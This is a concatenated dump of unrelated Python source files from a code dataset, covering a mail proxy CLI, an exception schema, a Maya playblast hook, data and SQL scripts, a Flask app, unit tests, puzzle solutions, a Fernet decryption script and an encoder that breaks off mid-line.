directory_path\n\n\ndef config_dict_from_parser(cfg_fn):\n cfg_dict = {}\n OPTS = {\n 'local': [('Listen', 'hostname', 'localhost'),\n ('Listen', 'port', 10025, 'int')],\n 'forward': [('Forward', 'hostname', 'localhost'),\n ('Forward', 'port', 10026, 'int')],\n }\n\n cfg = ConfigParser.ConfigParser()\n cfg.read(cfg_fn)\n\n def get_opt_or_default(cfg, opt):\n if not cfg.has_section(opt[0]):\n return opt[2]\n if not cfg.has_option(opt[0], opt[1]):\n return opt[2]\n v = cfg.get(opt[0], opt[1])\n if len(opt) > 3 and opt[3] == 'int':\n return int(v)\n return v\n\n # Handle special cases...\n for k in OPTS:\n val = OPTS[k]\n if type(val) is list:\n cfg_dict[k] = tuple([get_opt_or_default(cfg, x) for x in val])\n else:\n cfg_dict[k] = get_opt_or_default(cfg, val)\n if cfg_dict[k] is None:\n del(cfg_dict[k])\n\n if not cfg.has_section('General'):\n raise Exception(\"A General section is required for the configuration\")\n\n for opt in cfg.options('General'):\n v = cfg.get('General', opt)\n if v.isdigit():\n v = int(v)\n cfg_dict[opt] = v\n\n if cfg.has_section('Spamd'):\n cfg_dict['spamd'] = {}\n for opt in cfg.options('Spamd'):\n v = cfg.get('Spamd', opt)\n if v.isdigit():\n v = int(v)\n cfg_dict['spamd'][opt] = v\n\n if 'max_size' in cfg_dict:\n cfg_dict['max_size'] = filesize(cfg_dict['max_size'])\n if 'stats_report_interval' in cfg_dict:\n cfg_dict['stats_report_interval'] = interval(cfg_dict['stats_report_interval'])\n if 'store_directory' in cfg_dict:\n cfg_dict['store_directory'] = check_directory(cfg_fn, cfg_dict['store_directory'])\n cfg_dict['cfg_fn'] = cfg_fn\n return cfg_dict\n\n\ndef do_start():\n logger = get_surgat_logger()\n if len(startup_options) < 3:\n logger.error(\"Incorrect number of startup options provided???\")\n return\n cfg_data = config_dict_from_parser(startup_options[0])\n cfg_data.update({'do_filter': startup_options[1], 'collect_stats': startup_options[2]})\n\n logger.info(\"Starting surgat version {} using configuration from {}\".format(__version__, cfg_data['cfg_fn']))\n sms = SurgatMailServer(cfg_data)\n sms.start()\n try:\n asyncore.loop()\n except KeyboardInterrupt:\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser(description='surgat Spamassassin Proxy server')\n parser.add_argument('--verbose', action='store_true', help='Enable verbose logging')\n parser.add_argument('--filter', action='store_true', help='Enable email filtering (for development)')\n parser.add_argument('--collect-stats', action='store_true', help='Collect data on which rules are triggered')\n parser.add_argument('--config', action='store', default='/usr/local/etc/surgat.conf',\n help='Configuration file to use')\n parser.add_argument('--version', action='store_true', help='Show version and exit')\n parser.add_argument('--daemonize', action='store_true', help='Daemonize surgat')\n parser.add_argument('--pid', default='./surgat.pid', help='PID file to use')\n args = parser.parse_args()\n\n if args.version:\n print(\"surgat version {}\".format(__version__))\n sys.exit(0)\n\n if not os.path.exists(args.config):\n print(\"The config file '{}' does not exist. Unable to continue.\".format(args.config))\n sys.exit(0)\n\n logger = get_surgat_logger('DEBUG' if args.verbose else 'INFO')\n startup_options.extend([args.config, args.filter, args.collect_stats])\n if args.daemonize:\n logger.info(\"Starting as daemon\")\n daemon = Daemonize(app='surgat', pid=args.pid, action=do_start, logger=logger)\n daemon.start()\n sys.exit(0)\n do_start()\n logger.info(\"shutting down\")\n\n\ndef replay():\n parser = argparse.ArgumentParser(description='surgat replay message script')\n parser.add_argument('file', action='store', nargs='*', help='Files to process')\n args = parser.parse_args()\n\n for fn in args.file:\n rm = ReplayMessage(fn)\n if not rm.is_valid or not rm.process():\n continue\n","sub_path":"surgat/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129576443","text":"import json\nfrom typing import Any\nfrom typing import Mapping\nfrom typing import Optional\n\nfrom aiohttp.web_exceptions import HTTPError\nfrom marshmallow import Schema\nfrom marshmallow import fields\n\nfrom settings import DEBUG\n\n\nclass BaseAppException(HTTPError):\n ...\n\n\nclass ServerError(BaseAppException):\n status_code: int = 500\n message: str = 'Что-то пошло не так'\n title: Optional[str] = None\n description: str = ''\n\n def __init__(self,\n message: Optional[str] = None,\n title: Optional[str] = None,\n payload: Optional[Mapping[str, Any]] = None,\n debug: Optional[str] = None,\n exc_code: Optional[str] = None,\n status_code: Optional[int] = None,\n ):\n self.title = title or self.title\n self.code = exc_code or self.__class__.__name__\n self.status_code = status_code or self.status_code\n self.message = message or self.message\n self.payload = payload\n self.debug = debug\n super().__init__(\n body=json.dumps(self.as_dict(), ensure_ascii=False), content_type='application/json'\n )\n\n def as_dict(self) -> dict:\n \"\"\"\n Преобразует данные класса ошибки в словарь\n :return:\n \"\"\"\n debug = dict(debug=self.debug) if DEBUG else dict()\n error_body = dict(code=self.code, title=self.title, message=self.message, payload=self.payload, **debug)\n validated_response_data = self.get_schema().load(error_body)\n return validated_response_data\n\n @classmethod\n def get_schema(cls) -> Schema:\n \"\"\"\n Возвращает схему исключения\n :return:\n \"\"\"\n class ExceptionSchema(Schema):\n code = fields.Constant(cls.__name__, example=cls.__name__, description='Код ошибки в PascalCase')\n title = fields.String(\n required=False,\n allow_none=True,\n example=None,\n description='Заголовок ошибки для отображения на клиенте с учетом локализации.',\n )\n message = fields.String(\n required=True, example=cls.message, description='Сообщение об ошибке с учетом локализации.'\n )\n payload = fields.Dict(\n allow_none=True,\n required=True,\n example=None,\n description='Метаданные ошибки, могут содержать любые данные, '\n 'необходимые клиенту для корректной обработки ошибки.',\n )\n debug = fields.String(\n required=False,\n allow_none=True,\n example=None,\n description='(необязательное поле) Подробная информация об ошибке, '\n 'случившейся в серверном приложении. Приходит на клиент '\n 'только в случае, если в серверном приложении включен DEBUG-режим.',\n )\n\n ExceptionSchema.__name__ = cls.__name__\n return ExceptionSchema()\n\n\n__all__ = ['BaseAppException', 'ServerError']\n","sub_path":"src/exceptions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173822618","text":"# Copyright (c) 2013 Shotgun Software Inc.\n#\n# CONFIDENTIAL AND PROPRIETARY\n#\n# This work is provided \"AS IS\" and subject to the Shotgun Pipeline Toolkit\n# Source Code License included in this distribution package. See LICENSE.\n# By accessing, using, copying or modifying this work you indicate your\n# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights\n# not expressly granted therein are reserved by Shotgun Software Inc.\n\nimport os\nimport pprint\n\nimport maya.cmds as cmds\nimport pymel.core as pm\nimport traceback\nfrom contextlib import contextmanager\n\nimport sgtk\nfrom sgtk.platform.qt import QtGui\n\n\nHookClass = sgtk.get_hook_baseclass()\n\nPLAYBLAST_WINDOW = \"Playblast Window\"\n\n\nclass SetupWindow(HookClass):\n \"\"\"\n Hook called when creating playblast\n \"\"\"\n\n def set_hud(self):\n visible_huds = [f for f in pm.headsUpDisplay(listHeadsUpDisplays=True)\n if pm.headsUpDisplay(f, query=True, visible=True)]\n # hide all visible HUDs\n list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=False), visible_huds))\n\n # Add required HUD\n # User name\n edit_existing_hud = \"HUDUserName\" in pm.headsUpDisplay(listHeadsUpDisplays=True)\n pm.headsUpDisplay(\"HUDUserName\", edit=edit_existing_hud,\n command=lambda: os.getenv(\"USERNAME\", \"unknown.user\"),\n event=\"playblasting\", section=1, block=1)\n pm.headsUpDisplay(\"HUDUserName\", edit=True, visible=True, label=\"User:\")\n # Scene name\n edit_existing_hud = \"HUDSceneName\" in pm.headsUpDisplay(listHeadsUpDisplays=True)\n pm.headsUpDisplay(\"HUDSceneName\", edit=edit_existing_hud,\n command=lambda: cmds.file(query=True, location=True, shortName=True).rsplit(\".\", 1)[0],\n event=\"playblasting\", section=6, block=1)\n pm.headsUpDisplay(\"HUDSceneName\", edit=True, visible=True, label=\"Shot:\")\n # Focal length\n pm.headsUpDisplay(\"HUDFocalLength\", edit=True, visible=True, section=3, block=1)\n pm.headsUpDisplay(\"HUDCurrentFrame\", edit=True, visible=True, dataFontSize=\"large\", section=8, block=1)\n\n return visible_huds\n\n def unset_huds(self, huds=[]):\n # restore HUD state\n list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=False), pm.headsUpDisplay(listHeadsUpDisplays=True)))\n list(map(lambda f: pm.headsUpDisplay(f, edit=True, visible=True), huds))\n\n def get_playblast_params(self, filename=\"\"):\n app = self.parent\n playblast_params = dict(app.playblast_parameters)\n playblast_params[\"filename\"] = filename\n # include audio if available\n audio_list = pm.ls(type=\"audio\")\n if audio_list:\n playblast_params[\"sound\"] = audio_list[0]\n return playblast_params\n\n @contextmanager\n def create_window(self):\n # setting up context window for playblast\n\n \"\"\" try to get data from shotgun project fields\n need to get context's project\n context's shotgun instance\n \"\"\"\n app = self.parent\n model_editor_params = app.model_editor_parameters\n\n video_width = cmds.getAttr(\"defaultResolution.width\")\n video_height = cmds.getAttr(\"defaultResolution.height\")\n\n panel_name = cmds.getPanel(withFocus=True)\n if panel_name not in cmds.getPanel(type=\"modelPanel\"):\n message = \"Please select a viewport before trying to render\"\n self.logger.error(message)\n QtGui.QMessageBox.critical(None, \"No Viewport selected\", message)\n raise RuntimeError(message)\n\n camera_trans = cmds.modelEditor(panel_name, q=True, cam=True)\n camera = cmds.ls(camera_trans, dag=True, cameras=True)[0]\n model_editor_params[\"cam\"] = camera\n\n # Give Viewport 2.0 renderer only for Maya 2015++\n mayaVersionString = cmds.about(version=True)\n mayaVersion = int(mayaVersionString[:4]) if len(mayaVersionString) >= 4 else 0\n if mayaVersion >= 2015:\n model_editor_params[\"rendererName\"] = \"vp2Renderer\"\n orig_lineAAEnable = cmds.getAttr(\"hardwareRenderingGlobals.lineAAEnable\")\n cmds.setAttr(\"hardwareRenderingGlobals.lineAAEnable\", True)\n orig_multiSampleEnable = cmds.getAttr(\"hardwareRenderingGlobals.multiSampleEnable\")\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\", True)\n orig_multiSampleCount = cmds.getAttr(\"hardwareRenderingGlobals.multiSampleCount\")\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleCount\", 16)\n\n orig_holdOuts = {}\n if app.get_setting(\"use_holdout\"):\n for item in cmds.ls(type=\"mesh\", long=True):\n orig_holdOuts[item] = cmds.getAttr(\"{}.holdOut\".format(item))\n cmds.setAttr(\"{}.holdOut\".format(item), True)\n\n # Create window\n if pm.windowPref(PLAYBLAST_WINDOW, exists=True):\n pm.windowPref(PLAYBLAST_WINDOW, remove=True)\n window = pm.window(\n PLAYBLAST_WINDOW,\n titleBar=True,\n iconify=True,\n leftEdge=100,\n topEdge=100,\n width=video_width,\n height=video_height,\n sizeable=False\n )\n # Create editor area\n layout = pm.formLayout()\n editor = pm.modelEditor(**model_editor_params)\n pm.setFocus(editor)\n pm.formLayout(\n layout,\n edit=True,\n attachForm=(\n (editor, \"left\", 0),\n (editor, \"top\", 0),\n (editor, \"right\", 0),\n (editor, \"bottom\", 0)\n )\n )\n # Show window\n pm.setFocus(editor)\n pm.showWindow(window)\n pm.refresh()\n app.logger.debug(pprint.pformat(model_editor_params))\n try:\n yield editor\n except:\n traceback.print_exc()\n finally:\n pm.deleteUI(window)\n if mayaVersion >= 2015:\n cmds.setAttr(\"hardwareRenderingGlobals.lineAAEnable\", orig_lineAAEnable)\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleEnable\", orig_multiSampleEnable)\n cmds.setAttr(\"hardwareRenderingGlobals.multiSampleCount\", orig_multiSampleCount)\n for item, state in orig_holdOuts.items():\n cmds.setAttr(\"{}.holdOut\".format(item), state)\n","sub_path":"hooks/setup_window.py","file_name":"setup_window.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100487588","text":"# This file contains the definition of the one_line_helper function.\n\nfrom ... Graph import Graph\nfrom .... datum.Datum import Datum\n\ndef one_line_helper(datum, graph, graph_meta_data, hr, min, end_hr, end_min):\n \"\"\"\n This function processes one day of one attribute's data.\n\n This function produces 720 (x,y) coordinates.\n 60 data_points/hr * 24 hr/day= 1440 data_points/day\n\n Parameters:\n datum (Datum) : One hour of YTLA diagnostic information ~ 1 - 3 MB\n graph (Graph) : The object to be visualized.\n graph_meta_data (dict) : The querry attribute, begin and end times.\n hr (int) : The hour in which to begin graphing.\n min (int) : The minute in which to begin graphing.\n end_hr (int) : The hour in which to end graphing.\n end_min (int) : The minute in which to end graphing.\n\n Returns:\n graph (Graph) : Data that will be graphed.\n \"\"\"\n\n moment = datum.timestamp.replace('_', ' ')\n\n # Iterate over all hours, beginning with the first recoded hour of the day.\n for h in range(hr, end_hr + 1):\n # Determine whether it's the final hour.\n if h == end_hr: # it's the last hour in range\n end = end_min + 1\n else:\n end = 60\n # Iterate over all minutes within the hour, starting at first recorded.\n for m in range(min, end):\n hr_str = str(h)\n min_str = str(m)\n padded_hr_str = hr_str.zfill(2)\n padded_min_str = min_str.zfill(2)\n # replace hours and minutes in moment.\n moment = moment[0:11]\n moment += padded_hr_str + ':' + padded_min_str\n # Add the x coordinate of the (x,y) pair\n graph.x_values.append(moment)\n # Add the y coordinate of the (x,y) pair\n graph.lone_y_values.append(\\\n datum[graph_meta_data['attribute']][hr_str][min_str])\n\n min = 0\n\n return graph\n","sub_path":"client/models/graph/composers/line/one_line_helper.py","file_name":"one_line_helper.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303937685","text":"import runSql as rs\n\n\nif __name__ == \"__main__\":\n #16663\n #45222\n for i in range(16663,20000):\n sql = \"SELECT * FROM macro_child_report_category WHERE id = '%d'\" % i\n try:\n result = rs.SuccessSql(sql, isSelect=True)[0] # 返回查询得到的文本和其它内容 并保存为元组\n except:\n print(\"notfound: report category\" + str(i))\n continue\n\n reportName = result['reportName']\n reportId = result['reportId']\n indexFreq = result['indexFreq']\n area = result['area']\n\n sql = \"SELECT * FROM macro_child_report_module_indicator WHERE moduleId = '%s' and area='%s' and isnull=0 \" \\\n \"order by dataDuration asc\" % (reportId, area)\n try:\n indicatorData = rs.SuccessSql(sql, isSelect=True) # 返回查询得到的文本和其它内容 并保存为元组\n except:\n print(\"notfounddata: indicatorId = \" + str(reportId))\n continue\n else:\n if (len(indicatorData) == 0):\n continue\n dataDuration = indicatorData[0]['dataDuration']\n print(dataDuration)\n timeList = dataDuration.split('-')\n firsttime = timeList[0] + '-' + timeList[1] + '-' + timeList[2]\n lasttime = timeList[3] + '-' + timeList[4] + '-' + timeList[5]\n print(firsttime,lasttime)\n print(indexFreq)\n longyear = firsttime[:4] #取最久的时间的年份\n\n # 时间频率为年\n if (indexFreq == '1'):\n for yearrange1 in range(int(longyear), 2021):\n sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n % (reportName, reportId, yearrange1, indexFreq, area)\n print(sql)\n\n resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n resultFile.write(sql + ';' + \"\\n\")\n\n # 时间频率为季度\n elif (indexFreq == '3'):\n for yearrange3 in range(int(longyear) + 1, 2021):\n if (len(firsttime) < 10 or len(lasttime) < 10):\n monthList3 = ['3', '6', '9', '12']\n else:\n monthList3 = ['03', '06', '09', '12']\n for month3 in monthList3:\n data3 = str(yearrange3) + '-' + str(month3)\n print(data3)\n sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n % (reportName, reportId, data3, indexFreq, area)\n print(sql)\n\n resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n resultFile.write(sql + ';' + \"\\n\")\n\n # 时间频率为月度\n elif (indexFreq == '4'):\n lastyear = lasttime[:4]\n for yearrange4 in range(int(longyear) + 1, 2021):\n if (len(firsttime) < 10 or len(lasttime) < 10):\n monthList4 = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12']\n else:\n monthList4 = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']\n for month4 in monthList4:\n data4 = str(yearrange4) + '-' + str(month4)\n sql = \"insert into macro_child_report_category_date (reportName,reportId,date,\" \\\n \"indexFreq,area) values ('%s',%s,'%s','%s','%s')\" \\\n % (reportName, reportId, data4, indexFreq, area)\n print(sql)\n\n resFile = \"./macro_child_report_category_date_insertSql4.txt\"\n resultFile = open(resFile, 'a', encoding='utf-8', errors='ignore')\n resultFile.write(sql + ';' + \"\\n\")\n\n\n\n\n","sub_path":"报告指标处理部分/macro_child_report_category_date_operation.py","file_name":"macro_child_report_category_date_operation.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"496745261","text":"from flask import Flask, render_template, request, jsonify, redirect\nfrom data_science import make_model, test_model\nimport random\n\napp=Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/results', methods=['POST'])\ndef results():\n global model\n global score\n\n (model, score) = make_model()\n score = round(score * 100, 1)\n\n name = request.form[\"Name\"]\n title = request.form[\"Title\"]\n if title.startswith(\"Mr\"):\n title = title + \".\"\n\n Age = int(request.form[\"Age\"])\n Is_female = int(request.form[\"Is_female\"])\n Pclass = int(request.form[\"Pclass\"])\n emb_C = int(request.form[\"Embarked\"] == \"C\")\n emb_Q = int(request.form[\"Embarked\"] == \"Q\")\n emb_S = int(request.form[\"Embarked\"] == \"S\")\n Family_size = int(request.form[\"Family_size\"])\n Mr = int(request.form[\"Title\"] == \"Mr\")\n Mrs = int(request.form[\"Title\"] == \"Mrs\")\n Master = int(request.form[\"Title\"] == \"Master\")\n Miss = int(request.form[\"Title\"] == \"Miss\")\n\n prob_survived = test_model(model, Age, Is_female, Pclass, emb_C, emb_Q, emb_S, \n Family_size, Mr, Mrs, Master, Miss)\n random_chance = random.random()\n survived = random_chance < prob_survived.item()\n prob_survived = round(prob_survived*100, 1)\n \n return render_template('results.html', score=score, name=name, title=title, \n prob_survived=prob_survived, survived=survived)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"133562096","text":"import unittest\nfrom unittest.mock import patch\n\nfrom tmc import points, reflect\nfrom tmc.utils import load, load_module, reload_module, get_stdout, check_source\nfrom functools import reduce\nimport os\nimport os.path\nimport textwrap\nimport inspect, re\nfrom random import choice, randint, shuffle\n\nexercise = 'src.tuotantokaudet'\n\ndef source_rows(funktio: callable):\n src = inspect.getsource(funktio)\n lines = [line.strip() for line in re.split('\\\\n|;', src) \n if len(line.strip()) > 0 and not line.strip().startswith(\"#\")]\n return len(lines)\n\n@points('12.tuotantokaudet')\nclass TuotantokaudetTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n with patch('builtins.input', side_effect=[AssertionError(\"Syötteen pyytämistä ei odotettu\")]):\n cls.module = load_module(exercise, 'fi')\n\n def test_0a_paaohjelma_kunnossa(self):\n ok, line = check_source(self.module)\n message = \"\"\"Funktioita testaava koodi tulee sijoittaa lohkon\nif __name__ == \"__main__\":\nsisälle. Seuraava rivi tulee siirtää:\n\"\"\"\n self.assertTrue(ok, message+line)\n \n def test_1_funktio_olemassa(self):\n try:\n from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n except Exception as e:\n self.fail(f'Ohjelmasta pitäisi löytyä funktio nimeltä jarjesta_tuotantokausien_mukaan.')\n\n def test_2_paluuarvon_tyyppi(self):\n try:\n from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n val = jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, \n { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }])\n except Exception as e:\n self.fail(f\"Funktio antoi virheen kun sitä kutsuttiin näin:\\n\" + \n 'jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }]):\\n' + \n f'{e}')\n taip = str(type(val)).replace(\"\",\"\")\n self.assertTrue(type(val) == list, f\"Funktion jarjesta_tuotantokausien_mukaan pitäisi palauttaa arvo, jonka tyyppi on list,\" + \n f\" nyt se palauttaa arvon {val} joka on tyyppiä {taip}\\n kun sitä kutsutaan parametrilla\\n\" + \n 'jarjesta_tuotantokausien_mukaan([{ \"nimi\": \"Dexter\", \"pisteet\" : 8.6, \"kausia\":9 }, { \"nimi\": \"Friends\", \"pisteet\" : 8.9, \"kausia\":10 }])')\n \n\n def test_3_testaa_arvoilla1(self):\n from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n \n tdata = [(\"Dexter\",8.8, 9), (\"Simpsons\",8.6,30), (\"Friends\",8.9,10), (\"Oz\",8.7,6)]\n test_case = [{\"nimi\":tc[0], \"pisteet\":tc[1], \"kausia\":tc[2]} for tc in tdata]\n test_case_2 = test_case[:]\n corr = sorted(test_case, key=lambda t:t[\"kausia\"])\n val = jarjesta_tuotantokausien_mukaan(test_case)\n\n self.assertEqual(val, corr, f'Funktion pitäisi palauttaa lista\\n{corr}\\n' + \n f'kun sitä kutsutaan parametrilla\\n{test_case}\\nnyt funktio palauttaa\\n' + \n f'{val}')\n\n self.assertEqual(test_case, test_case_2, f\"Funktio ei saa muuttaa alkuperäistä listaa!\\n\" + \n f'Lista ennen kutsua oli\\n{test_case_2}\\nja kutsun jälkeen se on\\n{test_case}.')\n\n def test_4_testaa_arvoilla1(self):\n from src.tuotantokaudet import jarjesta_tuotantokausien_mukaan\n \n tdata = [(\"The Wire\",9.3, 5), (\"Game of Thrones\",9.2,8), (\"Band of Brothers\",9.4,1), (\"Sopranos\",9.2,6), (\"Sherlock\",9.1,4)]\n test_case = [{\"nimi\":tc[0], \"pisteet\":tc[1], \"kausia\":tc[2]} for tc in tdata]\n test_case_2 = test_case[:]\n corr = sorted(test_case, key=lambda t:t[\"kausia\"])\n val = jarjesta_tuotantokausien_mukaan(test_case)\n\n self.assertEqual(val, corr, f'Funktion pitäisi palauttaa lista\\n{corr}\\n' + \n f'kun sitä kutsutaan parametrilla\\n{test_case}\\nnyt funktio palauttaa\\n' + \n f'{val}')\n\n self.assertEqual(test_case, test_case_2, f\"Funktio ei saa muuttaa alkuperäistä listaa!\\n\" + \n f'Lista ennen kutsua oli\\n{test_case_2}\\nja kutsun jälkeen se on\\n{test_case}.')\n\n \n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"osa12-02_tuotantokaudet/test/test_tuotantokaudet.py","file_name":"test_tuotantokaudet.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105334111","text":"def parseFilePosition(file):\r\n fileArray = open(file).read().split('\\n')\r\n parsedInput = []\r\n for i in range(len(fileArray)):\r\n tempArray = []\r\n first = fileArray[i][fileArray[i].find('position=<')+10:fileArray[i].find(', ')]\r\n second = fileArray[i][fileArray[i].find(', ')+2:fileArray[i].find('> ')]\r\n tempArray.append(int(first))\r\n tempArray.append(int(second))\r\n parsedInput.append(tempArray)\r\n return parsedInput\r\n\r\ndef parseFileVelocity(file):\r\n fileArray = open(file).read().split('\\n')\r\n parsedInput = []\r\n for i in range(len(fileArray)):\r\n tempArray = []\r\n first = fileArray[i][fileArray[i].find('velocity=<')+10:fileArray[i].rfind(', ')]\r\n second = fileArray[i][fileArray[i].rfind(', ')+2:fileArray[i].rfind('>')]\r\n tempArray.append(int(first))\r\n tempArray.append(int(second))\r\n parsedInput.append(tempArray)\r\n return parsedInput\r\n\r\ndef printPoints(minX,minY,maxX,maxY,positionArray):\r\n for i in range(minY,maxY):\r\n line = ''\r\n for j in range(minX,maxX):\r\n currentPoint = [j,i]\r\n if currentPoint in positionArray:\r\n line += '#'\r\n else:\r\n line += '.'\r\n print(line)\r\n\r\ndef changePosition(positionArray,velocityArray):\r\n for i in range(len(positionArray)):\r\n positionArray[i][0] += velocityArray[i][0]\r\n positionArray[i][1] += velocityArray[i][1]\r\n return positionArray\r\n\r\npositionArray = parseFilePosition('AoC 2018 Day 10 - input.txt')\r\nvelocityArray = parseFileVelocity('AoC 2018 Day 10 - input.txt')\r\nwaitingTime = 0\r\nwhile True:\r\n positionArray = changePosition(positionArray,velocityArray)\r\n nearOthers = 0\r\n waitingTime += 1\r\n for i in range(len(positionArray)):\r\n x = positionArray[i][0]\r\n y = positionArray[i][1]\r\n if [x,y+1] in positionArray or [x+1,y+1] in positionArray or [x+1,y] in positionArray or [x+1,y-1] in positionArray or [x,y-1] in positionArray or [x-1,y-1] in positionArray or [x-1,y] in positionArray or [x-1,y+1] in positionArray:\r\n nearOthers += 1\r\n if nearOthers == len(positionArray):\r\n break\r\nprint(waitingTime)\r\n","sub_path":"AoC 2018 Day10 - part2.py","file_name":"AoC 2018 Day10 - part2.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270261610","text":"#!/usr/bin/env python\n#SBATCH --output=root_plot.txt\n#SBATCH -n 1\n\nfrom ROOT import TFile, TChain, TH1F, TCanvas\n\n\ndef chain_runs():\n\n chain = TChain(\"t\")\n for i in range(2045,2171):\n# for i in range(2026,2169):\n run_str = str(i)\n filepath = \"/mnt/analysis/e17028/rootfiles/run\" + run_str + \"-*.root\"\n# c = filepath.c_str()\n# std::cout << filepath << std::endl\n c = filepath\n chain.Add(c)\n\n \n correction_factor = -1.3\n c1 = TCanvas(\"c1\") \n c1.SetLogz()\n chain.Draw(\"energy_PIN1:(energy_TAC_PIN1_I2N+(energy_TAC_I2N_I2S*1.3)+1500)>>pid_corr(1000,14000,21000,1000,4000,8500)\",\"\",\"colz\")\n# pid_corr\n# c2 = TCanvas(\"c2\") \n# c2.SetLogz()\n# chain.Draw(\"energy_TAC_PIN1_I2N:energy_TAC_I2N_I2S>>pid(500,2000,7000,500,6000,14000)\",\"\",\"colz\")\n c1.SetTitle(\"Particle ID for 5 consecutive runs\")\n \n c1.SaveAs(\"c1.png\")\n# c1.SaveAs(\"c1.png\")\n t = chain.GetTree()\n\n \ndef main():\n\n chain_runs()\n print(\"hello world\")\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"py/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204324509","text":"from collections import Counter\n\n\nclass Solution:\n def checkInclusion(self, s1: str, s2: str) -> bool:\n\n cntr, n = Counter(s1), len(s1)\n for r in range(len(s2)):\n cntr[s2[r]] -= 1\n if r >= n:\n cntr[s2[r - n]] += 1\n if all([cntr[i] == 0 for i in cntr]):\n return True\n return False\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126689008","text":"from cryptography.fernet import Fernet\n\ndef decrypte_file(file):\n with open(\"./key.txt\") as f:\n key = f.read()\n cypher = Fernet(key) #Cria a cifra Fernet\n with open(file,'rb') as f: #Abre o ficheiro a ser desencriptado\n decrypted_file = cypher.decrypt(f.read()) #desencripta a mensagem\n ffile = file[:-10] #remove o .encrypted\n with open(ffile + '.decrypted', 'wb') as f: #abre o ficheiro.decrypted\n f.write(decrypted_file) #escreve a mensagem desencriptada\n\ndef main():\n decrypte_file(\"./mensagem.encrypted\") #Desencripta a mensagem\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Guioes/G1/NovaVersão/Decrypt.py","file_name":"Decrypt.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427834462","text":"import torch\nimport torch.nn as nn\nfrom torch import optim\nimport torch.nn.functional as F\nimport random\nimport numpy as np \n\nclass encoder(nn.Module):\n def __init__(self, input_dim, emb_dim, enc_hid_dim, dec_hid_dim, dropout):\n super().__init__()\n\n self.input_dim = input_dim\n self.emb_dim = emb_dim\n self.enc_hid_dim = enc_hid_dim\n self.dec_hid_dim = dec_hid_dim\n self.dropout = dropout\n\n self.embedding = nn.Embedding(input_dim, emb_dim)\n self.rnn = nn.GRU(emb_dim,enc_hid_dim,bidirectional = True)\n self.fc = nn.Linear(enc_hid_dim * 2,dec_hid_dim)\n\n self.dropout = nn.Dropout(dropout)\n \n def forward(self,src, src_len):\n\n #src = [len(src sentence), batch_size]\n #src_len = [len(src sentence)]\n\n embedded = self.dropout(self.embedding(src))\n #embedded = [len(src sentence), batch_size, emb_dim]\n\n packed_embedded = nn.utils.rnn.pack_padded_sequence(embedded, src_len)\n packed_outputs, hidden = self.rnn(packed_embedded)\n\n outputs, _ = nn.utils.rnn.pad_packed_sequence(packed_outputs) \n #outputs = [len(sentence), batch_size, hid_dim * num_directions]\n #hidden = [n_layers * num_directions, batch_size, hid_dim]\n\n #if bidirectional, hidden is stacked [forward_1, backward_1, forward_2, backward_2, ...]\n #outputs are always from the last layer\n #hidden [-2, :, : ] is the last of the forwards RNN \n #hidden [-1, :, : ] is the last of the backwards RNN\n\n hidden = torch.tanh(self.fc(torch.cat((hidden[-2,:,:], 